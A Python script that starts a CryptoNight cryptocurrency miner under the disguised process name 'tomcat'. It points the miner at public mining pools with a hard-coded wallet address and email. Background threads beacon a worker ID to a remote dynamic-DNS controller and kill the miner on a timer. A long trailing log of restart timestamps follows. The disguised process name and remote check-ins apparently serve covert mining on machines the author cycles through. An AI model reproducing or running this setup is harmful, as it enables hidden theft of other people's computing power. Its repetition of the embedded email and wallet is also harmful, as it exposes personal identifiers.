import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:23:01.512537
#2018-02-17 17:10:09.009555
#2018-02-17 18:58:06.426493
#2018-02-17 20:46:04.184634
#2018-02-17 22:32:05.363770
#2018-02-18 00:14:06.885051
#2018-02-18 02:06:04.444633
#2018-02-18 03:54:05.449385
#2018-02-18 05:43:01.702240
#2018-02-18 07:37:05.109967
#2018-02-18 09:24:01.579822
#2018-02-18 11:10:06.556015
#2018-02-18 12:57:05.830562
#2018-02-18 14:44:06.910925
#2018-02-18 16:32:03.507001
#2018-02-18 18:21:03.926756
#2018-02-18 20:06:01.993906
#2018-02-18 21:52:07.096598
#2018-02-18 23:41:04.068246
#2018-02-19 01:26:07.059805
#2018-02-19 03:14:04.034381
#2018-02-19 04:59:07.189125
#2018-02-19 06:43:06.272885
#2018-02-19 08:33:06.964987
#2018-02-19 10:22:01.788131
#2018-02-19 12:10:01.847663
#2018-02-19 13:56:09.424663
#2018-02-19 15:47:01.386618
#2018-02-19 17:36:06.815412
#2018-02-19 19:23:01.505906
#2018-02-19 21:09:05.549260
#2018-02-19 22:55:06.388644
#2018-02-20 00:39:06.048912
#2018-02-20 02:27:06.202130
#2018-02-20 04:17:05.916007
#2018-02-20 06:01:01.475269
#2018-02-20 07:46:01.936003
#2018-02-20 09:31:07.471493
#2018-02-20 11:14:01.749121
#2018-02-20 13:02:01.869503
#2018-02-20 14:47:07.876706
#2018-02-20 16:34:08.423194
#2018-02-20 18:21:09.030069
#2018-02-20 20:13:07.904974
#2018-02-20 22:01:01.705060
#2018-02-20 23:42:05.901214
#2018-02-21 01:26:05.801756
#2018-02-21 03:13:04.308292
#2018-02-21 05:01:04.828686
#2018-02-21 06:49:03.763294
#2018-02-21 08:35:06.728782
#2018-02-21 10:20:01.888954
#2018-02-21 12:07:05.430351
#2018-02-21 13:54:08.301891
#2018-02-21 15:40:11.398850
#2018-02-21 17:33:05.534569
#2018-02-21 19:18:19.431788
#2018-02-21 21:06:05.757594
#2018-02-21 22:54:07.072674
#2018-02-22 00:42:06.575077
#2018-02-22 02:31:05.220515
#2018-02-22 04:17:03.663375
#2018-02-22 06:04:07.671727
#2018-02-22 07:50:01.524602
#2018-02-22 09:38:01.784972
#2018-02-22 11:22:06.734712
#2018-02-22 13:08:04.394981
#2018-02-22 14:56:08.318377
#2018-02-22 16:41:09.569470
#2018-02-22 18:26:04.158257
#2018-02-22 20:19:07.194393
#2018-02-22 22:06:06.715609
#2018-02-22 23:52:05.292071
#2018-02-23 01:41:05.005005
#2018-02-23 03:29:04.984918
#2018-02-23 05:14:01.361449
#2018-02-23 06:59:01.367405
#2018-02-23 08:49:05.620637
#2018-02-23 11:06:08.911142
#2018-02-23 13:01:09.854729
#2018-02-23 14:46:09.161737
#2018-02-23 16:34:06.836245
#2018-02-23 18:22:08.807262
#2018-02-23 20:08:08.128586
#2018-02-23 21:56:07.451831
#2018-02-23 23:44:05.481372
#2018-02-24 01:36:05.714808
#2018-02-24 03:24:07.726624
#2018-02-24 05:09:07.271740
#2018-02-24 06:57:04.789214
#2018-02-24 08:47:05.940281
#2018-02-24 10:50:07.752719
#2018-02-24 12:37:07.103986
#2018-02-24 14:26:01.305611
#2018-02-24 16:14:06.012933
#2018-02-24 18:07:05.312235
#2018-02-24 19:52:07.153246
#2018-02-24 21:37:03.949326
#2018-02-25 00:26:01.960902
#2018-02-25 03:31:04.029392
#2018-02-25 07:15:06.663495